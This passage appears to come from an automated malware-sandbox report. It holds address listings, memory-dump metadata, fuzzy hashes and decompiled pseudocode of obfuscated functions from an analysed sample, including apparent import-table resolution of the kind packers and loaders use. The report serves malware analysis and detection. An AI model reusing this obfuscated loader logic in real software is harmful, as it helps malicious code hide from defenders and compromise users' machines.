0x001cb4d4
0x001cb4d7
0x001cb4d9
0x00000000
0x00000000
0x001cb4e0
0x001cb4e2
0x00000000
0x00000000
0x001cb4e4
0x001cb4e8
0x00000000
0x00000000
0x00000000
0x001cb4e8
0x00000000
0x00000000
0x00000000
0x001cb3d3
0x001cb3d3
0x001cb3d3
0x001cb3da
0x00000000
0x00000000
0x001cb3dc
0x001cb3dd
0x001cb3df
0x00000000
0x00000000
0x00000000
0x001cb3df
0x001cb407
0x001cb409
0x00000000
0x00000000
0x001cb419
0x001cb41b
0x001cb41d
0x00000000
0x00000000
0x001cb423
0x001cb42a
0x001cb456
0x001cb456
0x001cb458
0x001cb45a
0x001cb46e
0x001cb470
0x00000000
0x00000000
0x00000000
0x00000000
0x001cb45c
0x001cb45c
0x001cb45c
0x001cb465
0x001cb466
0x001cb468
0x001cb46a
0x001cb46a
0x00000000
0x001cb45c
0x001cb42c
0x001cb42c
0x001cb42f
0x001cb431
0x001cb443
0x001cb443
0x001cb446
0x001cb448
0x001cb448
0x001cb449
0x001cb449
0x001cb44f
0x001cb44f
0x00000000
0x00000000
0x00000000
0x00000000
0x001cb433
0x001cb433
0x001cb433
0x001cb43a
0x00000000
0x00000000
0x001cb43c
0x001cb43c
0x001cb43d
0x00000000
0x00000000
0x00000000
0x001cb43d
0x001cb43f
0x001cb441
0x001cb454
0x00000000
0x00000000
0x00000000
0x001cb454
0x00000000
0x001cb441
0x001cb3b3
0x001cb3b6
0x001cb3b9
0x00000000
0x00000000
0x001cb3bb
0x001cb3bd
0x00000000
0x00000000
0x00000000
0x001cb3bd
0x001cb382
0x001cb384
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 001CB3F2

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 2d9693ea2eb598e077ba87a7a176b2117e5e1557d895d9abca47d8faf8c867d2
Instruction ID: 8095fbb1dec84548ff1ac5d151fe3b0273828fe2b5abb6b41d2f47b748573308
Opcode Fuzzy Hash: 2d9693ea2eb598e077ba87a7a176b2117e5e1557d895d9abca47d8faf8c867d2
Instruction Fuzzy Hash: B861CF3060C6469BCB29CF28D8D2F29B3A2FBB4315F24853DD846C7692E731DC86CA44

Uniqueness

Uniqueness Score: -1.00%

Function 002A3A85, Relevance: 1.3, Strings: 1, Instructions: 92
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002A3A85(void* __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				signed int _t71;
				void* _t86;
				void* _t93;
				void* _t96;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				void* _t106;

				_t86 = __ebx;
				_t70 = __eax;
				if(_a4 != 0x904f) {
					_a4 = _a4 + 1;
					_t70 = __eax - 0x426;
				} else {
					_t100 = _t100 ^ _v8;
					_a4 = 0xffffffff;
				}
				_t71 = E002A4238(_t70, _t86, _t106,  *((intOrPtr*)(_t86 + 0x418391)));
				_t101 = _t100 & 0x00000000;
				_a4 = _a4 | 0xffffffff;
				 *(_t86 + 0x41864b) = 0xffffffff;
				if(_a4 != 0x6b3d) {
					_a4 = _a4 | _t71;
					_t71 = _t71 & 0x00000000;
					 *(_t86 + 0x41864b) =  *(_t86 + 0x41864b) ^ _t101;
				} else {
					_t93 = _t93 + 0x2ff;
				}
				_t102 = _t101 | 0x0000074b;
				_v8 = _v8 ^ _t71;
				_t72 = _t71 & 0xffffffff;
				if((_t71 & 0xffffffff) == 0xb85f) {
					_v8 = _v8 & 0xffffffff;
				}
				_v8 = 1;
				_v8 = _v8 + _t96;
				 *(_t86 + 0x4185e3) =  *(_t86 + 0x4185e3) + 1;
				 *(_t86 + 0x4185e3) =  *(_t86 + 0x4185e3) + 1;
				_v8 = _v8 ^ 0x00000000;
				E002A3BDB(_t72 & 0x00000000, _t86,  *((intOrPtr*)(_t86 + 0x41851f)));
				_v8 = _v8 ^ 0xffffffff;
				_a4 = _a4 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				 *(_t86 + 0x4185e3) =  *(_t86 + 0x4185e3) | 0xffffffff;
				_a4 = _a4 ^ 0x00000000;
				_a4 = _a4;
				_a4 = _a4 + 1;
				 *(_t86 + 0x4185e3) =  *(_t86 + 0x4185e3) - 1;
				_a4 = _a4 | 0x00000001;
				 *(_t86 + 0x4185e3) =  *(_t86 + 0x4185e3) + _t102 - 1 + _t96;
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 + 1;
				_a4 = _a4 ^ 0x00000000;
				return 0xffffffffffffffff;
			}

0x002a3a85
0x002a3a85
0x002a3a97
0x002a3aac
0x002a3aaf
0x002a3a99
0x002a3a99
0x002a3a9c
0x002a3aa3
0x002a3ac0
0x002a3ac5
0x002a3ac8
0x002a3acb
0x002a3adc
0x002a3ae6
0x002a3ae9
0x002a3aee
0x002a3ade
0x002a3ade
0x002a3ade
0x002a3af4
0x002a3afa
0x002a3afd
0x002a3b04
0x002a3b0f
0x002a3b0f
0x002a3b12
0x002a3b19
0x002a3b22
0x002a3b28
0x002a3b2e
0x002a3b38
0x002a3b46
0x002a3b59
0x002a3b5d
0x002a3b60
0x002a3b67
0x002a3b77
0x002a3b7a
0x002a3b7d
0x002a3b90
0x002a3b9c
0x002a3ba3
0x002a3ba7
0x002a3bb9
0x002a3bd8

Strings

=k, xrefs: 002A3AD5

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: =k
API String ID: 0-4048675473
Opcode ID: 98b9ea89f2378fc8d434ab78da3f182107d417997f6639ce0484e4127911c1e1
Instruction ID: 52c5ad001b1e2b8123015ce4e3c1426e70520ace72fb0fc788f2e928511e2f7a
Opcode Fuzzy Hash: 98b9ea89f2378fc8d434ab78da3f182107d417997f6639ce0484e4127911c1e1
Instruction Fuzzy Hash: F531B472810608EFEF04CE74CA463DE7A70EF01375F34836EAD29991D6CB788B519A50

Uniqueness

Uniqueness Score: -1.00%

Function 002A20EE, Relevance: .5, Instructions: 507
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E002A20EE(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _t278;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t289;
				void* _t291;
				signed int _t293;
				signed int _t294;
				signed int _t297;
				signed int _t300;
				signed int _t305;
				signed int _t308;
				void* _t309;
				signed int _t310;
				signed int _t318;
				signed int _t324;
				signed int _t337;
				signed int _t339;
				signed int _t341;
				signed int _t346;
				void* _t356;
				signed int _t358;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				void* _t389;
				signed int _t396;
				signed int _t402;
				void* _t405;
				signed int _t406;
				signed int _t408;
				void* _t409;
				void* _t419;
				signed int _t421;
				void* _t426;
				signed int _t435;
				signed int _t436;
				void* _t443;
				signed int _t450;
				signed int* _t451;

				_t401 = __esi;
				_t366 = __edi;
				_t337 = __edx;
				_t305 = __ecx;
				_t300 = __ebx;
				_push(__ecx);
				 *_t450 =  *_t450 ^ __ecx;
				 *_t450 =  *_t450 | _t435;
				_t436 = _t450;
				_t451 = _t450 + 0xfffffff0;
				if( *(__ebx + 0x418237) == 0) {
					_t278 =  *((intOrPtr*)(__ebx + 0x45d020))();
					 *_t451 = __esi;
					 *(__ebx + 0x418237) = _t278;
					_t401 = 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_v20);
				 *_t451 =  *_t451 + _t366;
				if( *(_t300 + 0x418399) == 0) {
					_t337 = _v28;
					_v28 =  *((intOrPtr*)(_t300 + 0x418607));
					_v32 =  *((intOrPtr*)(_t300 + 0x418163));
					_v20 = 0;
					_v36 = _v36 ^ _v32;
					_v40 =  *((intOrPtr*)(_t300 + 0x4183f0));
					_t401 = _t401;
					_t278 =  *((intOrPtr*)(_t300 + 0x45d044))(_t401, _v20, _t278, _t337);
					 *(_t300 + 0x418399) =  *(_t300 + 0x418399) & 0x00000000;
					 *(_t300 + 0x418399) =  *(_t300 + 0x418399) | _t366 ^ _v44 | _t278;
					_t366 = _t366;
				}
				_push(_v20);
				_v28 = _t401;
				if( *(_t300 + 0x4184c3) == 0) {
					_push(_t337);
					_t337 = _v32;
					_v32 =  *((intOrPtr*)(_t300 + 0x41862f));
					_push(_t305);
					_v36 =  *((intOrPtr*)(_t300 + 0x4181bf));
					_t305 = _t305;
					_push(_t366);
					_v40 =  *((intOrPtr*)(_t300 + 0x41805f));
					_push(_t278);
					_push(_v40);
					_v44 =  *((intOrPtr*)(_t300 + 0x4180b3));
					_pop(_t396);
					 *_t451 =  *_t451 & 0x00000000;
					 *_t451 =  *_t451 + _t305;
					_t278 =  *((intOrPtr*)(_t300 + 0x45d048))(_t278);
					_v20 = _t396;
					 *(_t300 + 0x4184c3) =  *(_t300 + 0x4184c3) & 0x00000000;
					 *(_t300 + 0x4184c3) =  *(_t300 + 0x4184c3) ^ (_t396 & 0x00000000 | _t278);
					_t366 = _v20;
				}
				_v20 = _t305;
				_t368 = _t366 & 0x00000000 | _t305 ^ _v20 ^ _a4;
				_t308 = _v20;
				if( *(_t300 + 0x4185b3) == 0) {
					_t278 =  *((intOrPtr*)(_t300 + 0x45d01c))();
					 *(_t300 + 0x4185b3) =  *(_t300 + 0x4185b3) & 0x00000000;
					 *(_t300 + 0x4185b3) =  *(_t300 + 0x4185b3) ^ (_t436 & 0x00000000 | _t278);
					_t436 = _t436;
				}
				_t369 = _t368 +  *((intOrPtr*)(_t368 + 0x3c));
				if( *(_t300 + 0x41818f) == 0) {
					_t406 = _v32;
					_v32 =  *((intOrPtr*)(_t300 + 0x41824f));
					_t369 = _v36;
					_v36 =  *((intOrPtr*)(_t300 + 0x4181c7));
					_v40 = _t308;
					_t278 =  *((intOrPtr*)(_t300 + 0x45d03c))(_v20, _t369, _t401);
					_v20 = _t308;
					 *(_t300 + 0x41818f) =  *(_t300 + 0x41818f) & 0x00000000;
					 *(_t300 + 0x41818f) =  *(_t300 + 0x41818f) ^ (_t308 ^ _v20 | _t278);
					_t310 = _v20;
				}
				if( *((intOrPtr*)(_t369 + 0x80)) != 0) {
					_t370 =  *((intOrPtr*)(_t369 + 0x80));
					if( *(_t300 + 0x41832c) == 0) {
						_t278 =  *((intOrPtr*)(_t300 + 0x45d020))();
						_v20 = _t370;
						 *(_t300 + 0x41832c) = _t278;
						_t370 = _v20;
					}
					_t371 = _t370 + _a4;
					if( *(_t300 + 0x41859b) == 0) {
						_t278 =  *((intOrPtr*)(_t300 + 0x45d024))();
						_v20 = _t401;
						 *(_t300 + 0x41859b) =  *(_t300 + 0x41859b) & 0x00000000;
						 *(_t300 + 0x41859b) =  *(_t300 + 0x41859b) ^ _t401 & 0x00000000 ^ _t278;
						_t406 = _v20;
					}
					do {
						if( *_t371 != 0) {
							_v32 = _t278;
							_t402 = 0 ^  *_t371;
							_t278 = 0;
							if( *(_t300 + 0x41816b) == 0) {
								_v32 =  *((intOrPtr*)(_t300 + 0x418487));
								_t337 = _v36;
								_v36 =  *((intOrPtr*)(_t300 + 0x418338));
								_t318 = _v40;
								_v40 =  *((intOrPtr*)(_t300 + 0x4183ec));
								_t278 =  *((intOrPtr*)(_t300 + 0x45d03c))(_t310, _t337, _t278, _t402);
								_v20 = _t318;
								 *(_t300 + 0x41816b) =  *(_t300 + 0x41816b) & 0x00000000;
								 *(_t300 + 0x41816b) =  *(_t300 + 0x41816b) | _t318 ^ _v20 ^ _t278;
								_t310 = _v20;
							}
						} else {
							if( *(_t300 + 0x418420) == 0) {
								_t278 =  *((intOrPtr*)(_t300 + 0x45d024))();
								_v20 = _t310;
								 *(_t300 + 0x418420) = 0 ^ _t278;
								_t310 = _v20;
							}
							_v20 = _t300;
							_t402 = _t406 & 0x00000000 ^ _t300 - _v20 ^  *(_t371 + 0x10);
							_t300 = _v20;
							if( *(_t300 + 0x41812f) == 0) {
								_t142 = _t300 + 0x418033; // 0x700
								_v32 =  *_t142;
								_t291 = _t278;
								_v36 = _v36 & 0x00000000;
								_v36 = _v36 + _t291;
								_t144 = _t300 + 0x41813b; // 0x300
								_v40 =  *_t144;
								_t356 = _t337;
								_t146 = _t300 + 0x4182eb; // 0x500
								_t358 = _v44;
								_v44 =  *_t146;
								_t278 =  *((intOrPtr*)(_t300 + 0x45d044))(_t356, _t402, _t300, _t278);
								 *(_t300 + 0x41812f) =  *(_t300 + 0x41812f) & 0x00000000;
								 *(_t300 + 0x41812f) =  *(_t300 + 0x41812f) ^ _t358 ^  *_t451 ^ _t278;
								_t337 = _t358;
							}
						}
						_push(_t278);
						_t282 = _v32;
						_v32 =  *(_t371 + 0x10);
						if( *(_t300 + 0x4185cb) == 0) {
							_t282 =  *((intOrPtr*)(_t300 + 0x45d024))();
							_v36 = _t371;
							 *(_t300 + 0x4185cb) = 0 ^ _t282;
							_t371 = 0;
						}
						_pop( *_t173);
						if( *(_t300 + 0x418273) == 0) {
							_t282 =  *((intOrPtr*)(_t300 + 0x45d020))();
							_v32 = _t310;
							 *(_t300 + 0x418273) = _t282;
							_t310 = 0;
						}
						_t284 = _t282 & 0x00000000 | _t402 & 0x00000000 ^ _a4;
						_t405 = _t402;
						if( *(_t300 + 0x418203) == 0) {
							_v32 = _v32 & 0x00000000;
							_v32 = _v32 | _t284;
							_t294 =  *((intOrPtr*)(_t300 + 0x45d020))();
							_v20 = _t371;
							 *(_t300 + 0x418203) = 0 ^ _t294;
							_t371 = _v20;
							_t284 = _t371;
						}
						_v16 = _v16 + _t284;
						if( *(_t300 + 0x4184ef) == 0) {
							_v32 =  *((intOrPtr*)(_t300 + 0x418127));
							_t371 = _v36;
							_v36 =  *((intOrPtr*)(_t300 + 0x4182f7));
							_v40 =  *((intOrPtr*)(_t300 + 0x4185f7));
							_t419 = _t405;
							_t421 = _v44;
							_v44 =  *((intOrPtr*)(_t300 + 0x41827f));
							_t284 =  *((intOrPtr*)(_t300 + 0x45d048))(_t451, _t419, _t405, _t371, _t310);
							 *(_t300 + 0x4184ef) =  *(_t300 + 0x4184ef) & 0x00000000;
							 *(_t300 + 0x4184ef) =  *(_t300 + 0x4184ef) | _t421 ^  *_t451 | _t284;
							_t405 = _t421;
						}
						 *_t200 =  *((intOrPtr*)(_t371 + 0xc));
						_push(_v20);
						_pop(_t309);
						if( *(_t300 + 0x418334) == 0) {
							_v32 = _v32 ^ _t300;
							_v32 = _v32 + _t309;
							_t324 = _v36;
							_v36 =  *((intOrPtr*)(_t300 + 0x41838d));
							_v40 =  *((intOrPtr*)(_t300 + 0x4185af));
							_t371 = _t371;
							_t436 = _v44;
							_v44 =  *((intOrPtr*)(_t300 + 0x418410));
							_t284 =  *((intOrPtr*)(_t300 + 0x45d03c))(_t284, _t309, _t300);
							_v20 = _t324;
							 *(_t300 + 0x418334) =  *(_t300 + 0x418334) & 0x00000000;
							 *(_t300 + 0x418334) =  *(_t300 + 0x418334) ^ (_t324 & 0x00000000 | _t284);
							_t309 = _t436;
						}
						_t310 = _t309 + _a4;
						if( *(_t300 + 0x418474) == 0) {
							_v32 = _v32 & 0x00000000;
							_v32 = _v32 + _t310;
							_t284 =  *((intOrPtr*)(_t300 + 0x45d020))();
							 *(_t300 + 0x418474) =  *(_t300 + 0x418474) & 0x00000000;
							 *(_t300 + 0x418474) =  *(_t300 + 0x418474) | _t337 - _v36 ^ _t284;
							_t337 = _t337;
							_t310 = _t337;
						}
						_t406 = _t405 + _a4;
						if( *(_t300 + 0x418020) == 0) {
							_v32 = _v32 - _t284;
							_v32 = _t310;
							_v36 =  *((intOrPtr*)(_t300 + 0x418493));
							_t337 = _v40;
							_v40 =  *((intOrPtr*)(_t300 + 0x418507));
							_v20 = _v20 & 0x00000000;
							_v44 = _v44 + _t300;
							 *_t451 =  *_t451 & 0x00000000;
							 *_t451 =  *_t451 ^ _t300;
							_t293 =  *((intOrPtr*)(_t300 + 0x45d044))(_v20, _v36, _t337, _t284);
							_v20 = _t371;
							 *(_t300 + 0x418020) =  *(_t300 + 0x418020) & 0x00000000;
							 *(_t300 + 0x418020) =  *(_t300 + 0x418020) | _t371 ^ _v20 | _t293;
							_t371 = _v20;
							_t310 = _t337;
						}
						_v32 = _t310;
						_t285 =  *((intOrPtr*)(_t300 + 0x45d00c))(_v20);
						_v12 = _v12 & 0x00000000;
						_v12 = _v12 ^ (_t300 - _v36 | _t285);
						_t300 = _t300;
						do {
							if(( *_t406 & 0x80000000) != 0) {
								_v36 =  *_t406;
								_t339 = _t337;
								 *_t259 = _t371;
								_v8 = _v8 & 0x0000ffff;
							} else {
								_v20 = 0;
								_push(_v20);
								_v36 = _v36 + _t406;
								_t346 = _t337;
								_v20 = _t346;
								_v8 = _v8 & 0x00000000;
								_v8 = _v8 ^ _t346 ^ _v20 ^  *_t406 + _a4 + 0x00000002;
								_t339 = _v20;
								_pop(_t406);
							}
							_push(_v8);
							_pop( *_t263);
							_push(_v20);
							_pop(_t286);
							_v36 = _v8;
							_t341 = _t339;
							_v20 = _t341;
							_t337 = _v20;
							_v40 = _v40 ^ _t436;
							_v40 = _v40 + (_t286 & 0x00000000 | _t341 & 0x00000000 | _v12);
							_t289 =  *((intOrPtr*)(_t300 + 0x45d008))(_t436, _t371);
							_push(_v20);
							_v44 = _t406;
							_t408 = _t406 & 0x00000000 ^ (_t371 & 0x00000000 | _v16);
							_t371 = _t371;
							_v20 = _t310;
							 *_t408 =  *_t408 & 0x00000000;
							 *_t408 =  *_t408 | _t310 & 0x00000000 ^ _t289;
							_t310 = _v20;
							_pop(_t409);
							_v44 = 4;
							_t278 = _t371;
							_t406 = _t409 + _t278;
							_v16 = _v16 + _t278;
						} while ( *_t406 != 0);
						_t371 =  &_a16;
						_t436 = _t436;
					} while ( *_t371 != 0 ||  *(_t371 + 0x10) != 0);
					_push(_t406);
					return _t278 ^ _t278;
				} else {
					if( *(_t300 + 0x4184e3) == 0) {
						_v32 =  *((intOrPtr*)(_t300 + 0x418253));
						_t436 = _v36;
						_v36 =  *((intOrPtr*)(_t300 + 0x4181ef));
						_v40 =  *((intOrPtr*)(_t300 + 0x41823b));
						_v20 = _v20 & 0x00000000;
						_v44 = _t451 + _v44;
						_t278 =  *((intOrPtr*)(_t300 + 0x45d044))(_v20, _t401, _t369, _v32, _t436);
						 *(_t300 + 0x4184e3) =  *(_t300 + 0x4184e3) & 0x00000000;
						 *(_t300 + 0x4184e3) =  *(_t300 + 0x4184e3) | _t308 & 0x00000000 ^ _t278;
						_t308 = _t308;
					}
					_pop(_t426);
					if( *((intOrPtr*)(_t300 + 0x41826f)) == 0) {
						_v28 =  *((intOrPtr*)(_t300 + 0x418587));
						_t443 = _t436;
						_v32 =  *((intOrPtr*)(_t300 + 0x418014));
						_t436 = _t443;
						_t308 = _v40;
						_v40 =  *(_t300 + 0x4182c7);
						_v44 =  *(_t300 + 0x4181ab);
						_t278 =  *((intOrPtr*)(_t300 + 0x45d048))(_t426, _t337, _t308, _t436, _t337, _t426);
						 *_t89 = _t278;
						_push(_v20);
						_pop( *_t91);
					}
					_pop(_t385);
					if( *(_t300 + 0x418593) == 0) {
						_v20 = _v20 & 0x00000000;
						_push(_v20);
						 *_t451 =  *_t451 + _t278;
						_v28 =  *((intOrPtr*)(_t300 + 0x4180a3));
						_push(_t308);
						_push(_v28);
						_v32 =  *(_t300 + 0x4185e7);
						_pop(_t389);
						_v36 =  *(_t300 + 0x4185bb);
						_t278 =  *((intOrPtr*)(_t300 + 0x45d044))(_t389, _t337);
						_v20 = _t337;
						 *(_t300 + 0x418593) =  *(_t300 + 0x418593) & 0x00000000;
						 *(_t300 + 0x418593) =  *(_t300 + 0x418593) | _t337 & 0x00000000 | _t278;
					}
					if( *(_t300 + 0x4180cb) == 0) {
						_t297 =  *((intOrPtr*)(_t300 + 0x45d024))();
						_v20 = _t308;
						 *(_t300 + 0x4180cb) =  *(_t300 + 0x4180cb) & 0x00000000;
						 *(_t300 + 0x4180cb) =  *(_t300 + 0x4180cb) | _t308 & 0x00000000 ^ _t297;
						return _t297;
					}
					return _t278;
				}
			}

0x002a20ee
0x002a20ee
0x002a20ee
0x002a20ee
0x002a20ee
0x002a20ee
0x002a20ef
0x002a20f2
0x002a20f5
0x002a20f7
0x002a2101
0x002a2103
0x002a210b
0x002a2112
0x002a2118
0x002a2118
0x002a2119
0x002a211d
0x002a2120
0x002a212a
0x002a2133
0x002a2133
0x002a213d
0x002a2140
0x002a214a
0x002a2155
0x002a2159
0x002a215a
0x002a2166
0x002a216d
0x002a2173
0x002a2173
0x002a2174
0x002a2177
0x002a2181
0x002a2183
0x002a218a
0x002a218a
0x002a218d
0x002a2195
0x002a2199
0x002a219a
0x002a21a1
0x002a21a4
0x002a21a5
0x002a21ac
0x002a21b0
0x002a21b2
0x002a21b6
0x002a21b9
0x002a21bf
0x002a21c7
0x002a21ce
0x002a21d4
0x002a21d4
0x002a21d7
0x002a21e3
0x002a21e5
0x002a21ef
0x002a21f1
0x002a21fd
0x002a2204
0x002a220a
0x002a220a
0x002a220b
0x002a2215
0x002a221e
0x002a221e
0x002a2228
0x002a2228
0x002a222e
0x002a2231
0x002a2237
0x002a223f
0x002a2246
0x002a224c
0x002a224c
0x002a2256
0x002a23a1
0x002a23ae
0x002a23b0
0x002a23b6
0x002a23bd
0x002a23c3
0x002a23c3
0x002a23c6
0x002a23d0
0x002a23d2
0x002a23d8
0x002a23e0
0x002a23e7
0x002a23ed
0x002a23ed
0x002a23f0
0x002a23f3
0x002a2498
0x002a249f
0x002a24a1
0x002a24a9
0x002a24b3
0x002a24bf
0x002a24bf
0x002a24c9
0x002a24c9
0x002a24cc
0x002a24d2
0x002a24da
0x002a24e1
0x002a24e7
0x002a24e7
0x002a23f9
0x002a2400
0x002a2402
0x002a2408
0x002a240f
0x002a2415
0x002a2415
0x002a2418
0x002a2424
0x002a2426
0x002a2430
0x002a2434
0x002a243a
0x002a243e
0x002a2440
0x002a2444
0x002a2449
0x002a244f
0x002a2453
0x002a2455
0x002a245b
0x002a245b
0x002a245e
0x002a246a
0x002a2471
0x002a2477
0x002a2477
0x002a2478
0x002a24ea
0x002a24ee
0x002a24ee
0x002a24f8
0x002a24fa
0x002a2502
0x002a2509
0x002a250f
0x002a250f
0x002a2510
0x002a251a
0x002a251c
0x002a2524
0x002a252b
0x002a2531
0x002a2531
0x002a253c
0x002a253e
0x002a2546
0x002a2549
0x002a254d
0x002a2550
0x002a2556
0x002a255d
0x002a2563
0x002a2566
0x002a2566
0x002a2567
0x002a2571
0x002a257a
0x002a2584
0x002a2584
0x002a258f
0x002a2593
0x002a259b
0x002a259b
0x002a259f
0x002a25ab
0x002a25b2
0x002a25b8
0x002a25b8
0x002a25bc
0x002a25bf
0x002a25c2
0x002a25ca
0x002a25cd
0x002a25d0
0x002a25da
0x002a25da
0x002a25e5
0x002a25e9
0x002a25f1
0x002a25f1
0x002a25f4
0x002a25fa
0x002a2602
0x002a2609
0x002a2612
0x002a2612
0x002a2613
0x002a261d
0x002a2620
0x002a2624
0x002a2627
0x002a2633
0x002a263a
0x002a2640
0x002a2641
0x002a2641
0x002a2642
0x002a264c
0x002a264f
0x002a2652
0x002a265c
0x002a2666
0x002a2666
0x002a2669
0x002a2670
0x002a2674
0x002a2678
0x002a267b
0x002a2681
0x002a2689
0x002a2690
0x002a2696
0x002a2699
0x002a2699
0x002a269d
0x002a26a0
0x002a26ac
0x002a26b0
0x002a26b3
0x002a26b4
0x002a26ba
0x002a26f3
0x002a26f7
0x002a26f8
0x002a26fb
0x002a26bc
0x002a26bc
0x002a26c3
0x002a26c6
0x002a26d9
0x002a26da
0x002a26e2
0x002a26e6
0x002a26e9
0x002a26ec
0x002a26ec
0x002a2702
0x002a2705
0x002a2708
0x002a270b
0x002a2711
0x002a2715
0x002a2716
0x002a2724
0x002a2728
0x002a272b
0x002a272e
0x002a2734
0x002a2737
0x002a2744
0x002a2746
0x002a2747
0x002a274f
0x002a2752
0x002a2754
0x002a2757
0x002a2759
0x002a2760
0x002a2761
0x002a2763
0x002a2766
0x002a2778
0x002a277a
0x002a277b
0x002a278e
0x002a2799
0x002a225c
0x002a2263
0x002a226c
0x002a2276
0x002a2276
0x002a2281
0x002a2286
0x002a228d
0x002a2290
0x002a229c
0x002a22a3
0x002a22a9
0x002a22a9
0x002a22aa
0x002a22b2
0x002a22bc
0x002a22c0
0x002a22c9
0x002a22cd
0x002a22d6
0x002a22d6
0x002a22e1
0x002a22e6
0x002a22ed
0x002a22f0
0x002a22f3
0x002a22f3
0x002a22f9
0x002a2301
0x002a2303
0x002a2307
0x002a230a
0x002a2314
0x002a2317
0x002a2318
0x002a231f
0x002a2323
0x002a232c
0x002a2331
0x002a2337
0x002a233f
0x002a2346
0x002a234c
0x002a2357
0x002a2359
0x002a235f
0x002a2367
0x002a236e
0x00000000
0x002a2374
0x002a2377
0x002a2377

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 190ef29eab26b44226983159a1f394aa4629ad48f98315d79de7dc04f91af78e
Instruction ID: feffa183977d517e37464307fa53d43081d2a1d1cb8b4799b6d7513ea5caaf1f
Opcode Fuzzy Hash: 190ef29eab26b44226983159a1f394aa4629ad48f98315d79de7dc04f91af78e
Instruction Fuzzy Hash: 82229C32804215DFEF14CF64C9897AABBF5FF88715F09846DDC889B146CB781860CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 002A4859, Relevance: .5, Instructions: 466
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E002A4859(signed int __ebx, signed int __ecx, void* __edx, signed int __edi, signed int __esi, signed int _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ebp;
				signed int _t217;
				signed int _t219;
				void* _t220;
				signed int _t221;
				signed int _t225;
				signed int _t230;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t245;
				signed int _t248;
				signed int _t253;
				signed int _t261;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t274;
				int _t276;
				void* _t278;
				int _t279;
				void* _t310;
				signed int _t312;
				void* _t316;
				signed int _t323;
				signed int _t328;
				signed int _t330;
				void* _t333;
				signed int _t334;
				void* _t339;
				void* _t344;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				void* _t365;
				void* _t366;
				void* _t368;
				void* _t369;
				void* _t374;
				signed int _t376;
				signed int* _t384;

				_t359 = __esi;
				_t328 = __edi;
				_t310 = __edx;
				_t258 = __ecx;
				_t242 = __ebx;
				if( *(__ebx + 0x41819b) == 0) {
					_t241 =  *((intOrPtr*)(__ebx + 0x45d020))();
					_push(__ecx);
					 *(__ebx + 0x41819b) =  *(__ebx + 0x41819b) & 0x00000000;
					 *(__ebx + 0x41819b) =  *(__ebx + 0x41819b) ^ (__ecx -  *_t384 | _t241);
					_pop(_t258);
				}
				 *_t384 =  *_t384 & 0x00000000;
				 *_t384 =  *_t384 + _t359;
				_v20 = _v20 & 0x00000000;
				 *_t384 =  *_t384 + _t242 + 0x418657;
				_t217 =  *((intOrPtr*)(_t242 + 0x45d018))(_v20, _t258);
				 *(_t242 + 0x418247) =  *(_t242 + 0x418247) & 0x00000000;
				 *(_t242 + 0x418247) =  *(_t242 + 0x418247) | _t258 & 0x00000000 ^ _t217;
				_t261 = _t258;
				_push(_v12);
				 *_t384 = _t328;
				if( *(_t242 + 0x4183d8) == 0) {
					_t240 =  *((intOrPtr*)(_t242 + 0x45d01c))();
					 *(_t242 + 0x4183d8) =  *(_t242 + 0x4183d8) & 0x00000000;
					 *(_t242 + 0x4183d8) =  *(_t242 + 0x4183d8) | _t328 & 0x00000000 ^ _t240;
					_t328 = _t328;
				}
				_t361 = _t359 & 0x00000000 | _t242 & 0x00000000 ^ _a4;
				_t245 = _t242;
				if( *(_t245 + 0x4184bb) == 0) {
					_t310 =  *_t384;
					 *_t384 =  *(_t245 + 0x4180d3);
					_v40 =  *((intOrPtr*)(_t245 + 0x418328));
					_t374 = _t374;
					_v44 = _t310;
					_t239 =  *((intOrPtr*)(_t245 + 0x45d040))(_v20, _t310, _t310);
					_v48 = _t261;
					 *(_t245 + 0x4184bb) = 0 ^ _t239;
					_t261 = 0;
				}
				_t330 = _t328 & 0x00000000 | _t245 & 0x00000000 ^ _a8;
				_t248 = _t245;
				_v20 = 0;
